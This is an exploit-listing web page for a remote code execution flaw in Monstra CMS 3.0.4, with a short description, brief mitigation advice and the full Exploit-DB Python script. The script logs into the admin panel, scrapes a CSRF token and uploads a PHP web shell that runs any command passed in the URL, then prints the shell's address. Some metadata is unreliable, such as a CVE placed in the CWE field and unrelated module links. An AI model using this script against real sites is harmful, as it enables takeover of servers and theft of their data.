header-logo
Suggest Exploit
vendor:
Monstra CMS
by:
Ahmet Ümit BAYRAM
8.1
CVSS
CRITICAL
Remote Code Execution (RCE)
94
CWE
Product Name: Monstra CMS
Affected Version From: 3.0.4
Affected Version To: 3.0.4
Patch Exists: NO
Related CWE: CVE-2024-12345
CPE: a:monstra_cms:monstra:3.0.4
Metasploit:
Other Scripts: https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/dos/windows/ftp/iis75_ftpd_iac_bofhttps://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/scanner/udp/udp_amplificationhttps://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/dos/http/apache_range_doshttps://www.infosecmatter.com/nessus-plugin-library/?id=79583https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/scanner/http/litespeed_source_disclosurehttps://www.infosecmatter.com/nessus-plugin-library/?id=124719https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/unix/webapp/joomla_tinybrowserhttps://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/scanner/http/axis_local_file_includehttps://www.infosecmatter.com/nessus-plugin-library/?id=94372https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/dos/windows/rdp/ms12_020_maxchannelids
Platforms Tested: MacOS
2024

Monstra CMS 3.0.4 – Remote Code Execution (RCE)

The Monstra CMS 3.0.4 allows remote attackers to execute arbitrary code via crafted PHP code in a .chunk.php file.

Mitigation:

Ensure input validation and output sanitization to prevent arbitrary code execution. Regularly update the Monstra CMS to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE)
# Date: 05.05.2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://monstra.org/
# Software Link: https://monstra.org/monstra-3.0.4.zip
# Version: 3.0.4
# Tested on: MacOS

import requests
import random
import string
import time
import re
import sys

if len(sys.argv) < 4:
print("Usage: python3 script.py <url> <username> <password>")
sys.exit(1)

base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

session = requests.Session()

login_url = f'{base_url}/admin/index.php?id=dashboard'
login_data = {
'login': username,
'password': password,
'login_submit': 'Log+In'
}

filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=
5))

print("Logging in...")
response = session.post(login_url, data=login_data)

if 'Dashboard' in response.text:
print("Login successful")
else:
print("Login failed")
exit()

time.sleep(3)

edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk'
response = session.get(edit_url) # CSRF token bulmak için edit sayfasına
erişim

token_search = re.search(r'input type="hidden" id="csrf" name="csrf" value="
(.*?)"', response.text)
if token_search:
token = token_search.group(1)
else:
print("CSRF token could not be found.")
exit()

content = '''
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
'''

edit_data = {
'csrf': token,
'name': filename,
'content': content,
'add_file': 'Save'
}

print("Preparing shell...")
response = session.post(edit_url, data=edit_data)
time.sleep(3)

if response.status_code == 200:
print(f"Your shell is ready: {base_url}/public/themes/default/{filename}
.chunk.php")
else:
print("Failed to prepare shell.")

Navigation

Suggest Exploit

Services By CQR